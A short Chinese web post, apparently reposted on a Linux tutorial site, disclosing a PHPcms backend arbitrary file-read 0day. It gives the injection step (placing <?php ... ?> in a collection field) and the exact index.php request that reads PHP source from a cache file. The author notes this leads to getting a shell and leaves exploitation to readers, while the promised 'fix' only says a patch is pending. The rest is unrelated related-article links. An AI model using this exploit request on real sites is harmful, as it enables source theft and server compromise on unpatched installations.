后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
未经允许不得转载:搬瓦工中文网 » PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
相关推荐
- 如何在Linux系统中有效禁止Ping操作:详细实现步骤与实例解析
- Linux环境下高效远程连接MySQL数据库的详细步骤与实践指南
- 新手必看:Linux SSH命令详解 - 轻松实现远程登录技巧
- 如何在Linux CentOS 6.6系统上一步步安装MySQL源码包:详细教程
- CentOS7系统如何按时间段截取Tomcat日志并保存到指定文件的操作指南
- Centos 7.2 系统中利用 yum 命令快速安装配置 LAMP 环境(Linux+Apache+MySQL+PHP)教程
- 如何在Linux系统中快速查看和设置环境变量——详细教程
- 一键操作:如何在U盘上安装Ubuntu系统,实现便携式即插即用体验
- 如何在Ubuntu 12.10中轻松查看CPU温度:详细步骤指南
- Ubuntu 12.04 重启后 resolv.conf 被清空问题解决方法详解
搬瓦工中文网





